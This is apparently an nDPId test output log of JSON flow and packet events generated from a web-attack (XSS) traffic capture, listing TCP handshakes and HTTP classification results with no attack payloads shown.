+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347352698,"flow_last_seen":1499347357715,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56280,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347356478,"flow_last_seen":1499347361716,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56320,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347356478,"flow_last_seen":1499347361716,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347357727,"flow_last_seen":1499347363716,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56334,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347357727,"flow_last_seen":1499347363716,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56334,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347360285,"flow_last_seen":1499347365717,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56360,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347360285,"flow_last_seen":1499347365717,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56360,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4335,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347486787,"flow_last_seen":1499347486787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347486787,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57712,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4335,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":1,"flow_last_seen":1499347486787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347486787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8D7tAAD4GthWsEAABwKgKMuFwAFB2mu1nAAAAAKACchA1KgAAAgQFtAQCCAoBOuLcAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4336,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":2,"flow_last_seen":1499347486787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347486787,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4XA0h5CedprtaKAScSC4rAAAAgQFtAQCCAoD5LRSATri3AEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":3,"flow_last_seen":1499347486787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347486787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0D7xAAD4GthysEAABwKgKMuFwAFB2mu1oNIeQn4AQAOVXtAAAAQEICgE64twD5LRS"} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4344,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347484263,"flow_last_seen":1499347487799,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347487799,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57684,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347489408,"flow_last_seen":1499347489408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347489408,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":1,"flow_last_seen":1499347489408,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347489408,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86N5AAD4G3PGsEAABwKgKMuGKAFByXg2yAAAAAKACchAWcgAAAgQFtAQCCAoBOuVsAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4355,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":2,"flow_last_seen":1499347489408,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347489408,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4YpoWWpFcl4Ns6AScSCJ7AAAAgQFtAQCCAoD5LbhATrlbAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4356,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":3,"flow_last_seen":1499347489409,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347489409,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06N9AAD4G3PisEAABwKgKMuGKAFByXg2zaFlqRoAQAOUo9AAAAQEICgE65WwD5Lbh"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4363,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347490659,"flow_last_seen":1499347490659,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347490659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57752,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4363,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":308,"flow_packet_id":1,"flow_last_seen":1499347490659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347490659,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8roVAAD4GF0usEAABwKgKMuGYAFBT40ghAAAAAKACchD5NwAAAgQFtAQCCAoBOuakAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4364,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":308,"flow_packet_id":2,"flow_last_seen":1499347490659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347490659,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4ZjtXjkmU+NIIqAScSAXkwAAAgQFtAQCCAoD5LgaATrmpAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4365,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":308,"flow_packet_id":3,"flow_last_seen":1499347490660,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347490660,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0roZAAD4GF1KsEAABwKgKMuGYAFBT40gi7V45J4AQAOW2mQAAAQEICgE65qUD5Lga"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4384,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347493167,"flow_last_seen":1499347493167,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347493167,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4384,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":1,"flow_last_seen":1499347493167,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347493167,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VdJAAD4Gb\/6sEAABwKgKMuGyAFCUXbzFAAAAAKACchBBjAAAAgQFtAQCCAoBOukXAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":2,"flow_last_seen":1499347493167,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347493167,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4bJdzKzTlF28xqAScSB5WQAAAgQFtAQCCAoD5LqNATrpFwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4386,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":3,"flow_last_seen":1499347493168,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347493168,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VdNAAD4GcAWsEAABwKgKMuGyAFCUXbzGXcys1IAQAOUYYAAAAQEICgE66RgD5LqN"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4393,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347494446,"flow_last_seen":1499347494446,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347494446,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57792,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4393,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":310,"flow_packet_id":1,"flow_last_seen":1499347494446,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347494446,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8G1FAAD4Gqn+sEAABwKgKMuHAAFAmKfEGAAAAAKACchB6MQAAAgQFtAQCCAoBOupXAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4394,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":310,"flow_packet_id":2,"flow_last_seen":1499347494446,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347494446,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4cATAV39JinxB6AScSBKYAAAAgQFtAQCCAoD5LvNATrqVwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4395,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":310,"flow_packet_id":3,"flow_last_seen":1499347494447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347494447,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0G1JAAD4GqoasEAABwKgKMuHAAFAmKfEHEwFd\/oAQAOXpZwAAAQEICgE66lcD5LvN"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4405,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347495714,"flow_last_seen":1499347495714,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495714,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4405,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":1,"flow_last_seen":1499347495714,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347495714,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ai5AAD4GW6KsEAABwKgKMuHOAFCuqYG6AAAAAKACchBfsgAAAgQFtAQCCAoBOuuUAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4406,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":2,"flow_last_seen":1499347495714,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347495714,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4c4n\/DE+rqmBu6AScSBGaAAAAgQFtAQCCAoD5L0KATrrlAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4407,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":3,"flow_last_seen":1499347495715,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347495715,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ai9AAD4GW6msEAABwKgKMuHOAFCuqYG7J\/wxP4AQAOXlbwAAAQEICgE665QD5L0K"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347361540,"flow_last_seen":1499347366717,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56374,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347361540,"flow_last_seen":1499347366717,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56374,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347364056,"flow_last_seen":1499347369718,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56400,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347364056,"flow_last_seen":1499347369718,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347365320,"flow_last_seen":1499347370718,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56414,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347365320,"flow_last_seen":1499347370718,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347366586,"flow_last_seen":1499347371718,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56428,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347366586,"flow_last_seen":1499347371718,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56428,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347369077,"flow_last_seen":1499347374718,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56454,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347369077,"flow_last_seen":1499347374718,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347370339,"flow_last_seen":1499347375719,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56468,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347370339,"flow_last_seen":1499347375719,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347495749,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56468,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4423,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347498249,"flow_last_seen":1499347498249,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347498249,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57832,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4423,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":312,"flow_packet_id":1,"flow_last_seen":1499347498249,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347498249,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LPFAAD4GmN+sEAABwKgKMuHoAFBfF8L\/AAAAAKACchBrawAAAgQFtAQCCAoBOu4OAAAAAAEDAwc="} 